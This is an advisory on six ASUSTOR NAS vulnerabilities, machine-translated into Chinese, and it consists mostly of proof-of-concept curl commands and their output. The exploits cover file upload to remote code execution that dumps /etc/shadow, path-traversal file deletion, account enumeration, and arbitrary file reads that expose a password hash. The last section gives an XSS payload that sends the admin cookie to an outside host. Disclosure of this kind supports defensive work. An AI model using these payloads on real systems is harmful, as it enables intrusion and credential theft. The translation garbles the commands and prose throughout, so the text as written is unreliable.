(R1)多个ASUSTOR数据主漏洞

在研究一个ASUSTOR - 202 t NAS,站得住脚的发现多个漏洞。

cve - 2018 - 15694:身份验证的文件上传

经过身份验证的远程攻击者非管理员可以上传一个文件在目标文件系统的任何地方。目标总是上传文件的名称WallPaper_1.jpg。如果“Web服务器”功能在设备上启用一个未经身份验证的远程攻击者就可以实现远程代码执行通过编写/目录/。

curl - k - x美元POST - h”内容类型:多部分/格式;边界=玩弄了——“美元——data-binary”玩弄\ x0d \ x0aContent-Disposition:格式;文件名= \“1. jpg \ \ x0d \ x0a \ x0d \ x0a # !/bin/sh \ x0aecho - e \“内容类型:文本/平原\ \ n \ \ n \”; id; uname -;猫/etc/shadow \ x0d \ x0a-pwned - \ x0d \ x0a“美元”https://192.168.1.10:8001 / portal / api /壁纸/ uploadwallpaper.cgi ? sid = 9 dpdw4u9jum.2hnb&act = upload&appdirpath = . . / . . / . ./分享/ Web /目录/{“成功”:真}$ curl http://192.168.1.10:80 - k /目录/ WallPaper_1.jpg uid = 999(管理)gid = 999(管理员)组= 100(用户),997 (nvradmins), 999(管理员)Linux克拉克3.10.70 # 1 SMP结婚2018年6月13日01:06:06 CST armv7l GNU / Linux根:$ 1 $ eN4aG9y2Mc6GFsQ1SMLSm WRyOw / 55美元。:17599:0:99999:7:::avahi: *: 15259:0:99999:7:::…

cve - 2018 - 15695:验证任意文件删除

经过身份验证的远程非管理员用户可以删除任何文件在文件系统由于路径遍历的脆弱性wallpaper.cgi。

curl - k美元“https://192.168.1.10:8001 / portal / api /壁纸/ wallpaper.cgi ? sid = 2 leyw3.ehayucwvf&act = removewallpaper&appdirpath = . . / . . / . . / tmp文件=测试。文件“{“成功”:真}

枚举cve - 2018 - 15696:验证帐户

经过身份验证的远程非管理员用户可以在设备上通过枚举所有的账户user.cgi。

curl - s - k美元“https://192.168.1.10:8001 / portal / api / accessControl / user.cgi吗?sid = C8wyW20b6wYUz31g&act = list&start = 0限制= 0域python - m = 0 " | json。来ol { "datas": [ { "description": "guest", "email": "", "group": "-", "name": "guest", "primary_gid": 65534, "status": "Inactive", "uid": 998 }, { "description": "Admin", "email": "", "group": "administrators", "name": "admin", "primary_gid": 999, "status": "Active", "uid": 999 }, { "description": "", "email": "", "group": "users", "name": "courtney", "primary_gid": 100, "status": "Active", "uid": 1000 }, { "description": "", "email": "", "group": "users", "name": "lab", "primary_gid": 100, "status": "Active", "uid": 1001 } ], "success": true, "total": 4 }

cve - 2018 - 15697:身份验证文件披露

经过身份验证的远程非管理员用户可以访问文件NAS分享通过指定请求的完整的文件路径downloadwallpaper.cgi。在接下来的例子中,bash历史文件读取/home/admin/。

curl - k美元“https://192.168.1.10:8001门户/ api /壁纸/ downloadwallpaper.cgi ? = download&folder = / home /管理文件=。ash_history&sid = 28 tdw5u-ukn7mgan ' id ps ax netstat——netstat - a netstat -tulpn熔化炉熔化炉51417 / tcp pstree uname - ls ps ax netstat -lupn su - sudo -我退出

cve - 2018 - 15698:身份验证文件披露

远程身份验证管理用户可以阅读任何文件的内容在远程目标通过发送一个请求loginimage.cgi。

curl - k美元“https://192.168.1.10:8001 / portal / api /设置/ loginimage.cgi吗?sid = 4 k4yw-gqeqazwez0&act = preview&file = / etc /影子”根:$ 1 $ WRyOw / 55美元eN4aG9y2Mc6GFsQ1SMLSm: 17599:0:99999:7:::

cve - 2018 - 15699: MITM XSS

当远程管理用户第一次验证NAS执行wget来http://update.asustor.com/adm_update.php?architecture=armv7l&model=AS1004T&version=3.1.0.RFQ3&initialized=true和解析结果. conf文件。下面是一个示例文件:

[AS10XX] ModelName = = 3.1.4 AS10XXT版本。RID1 ReleaseDate = 2018/06/14 ReleaseNote = http://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.4.RID1.pdf DownloadLink = http://download.asustor.com/download/adm/ARM_3.1.4.RID1.img

中间一个人可以修改版本字段以注入Javascript抢断管理员的凭证。例如:

Version = pwnme < img src = " http://192.168.1.237/pwn?c = ' onerror =我=新形象();i.src = this.src +。, ' / >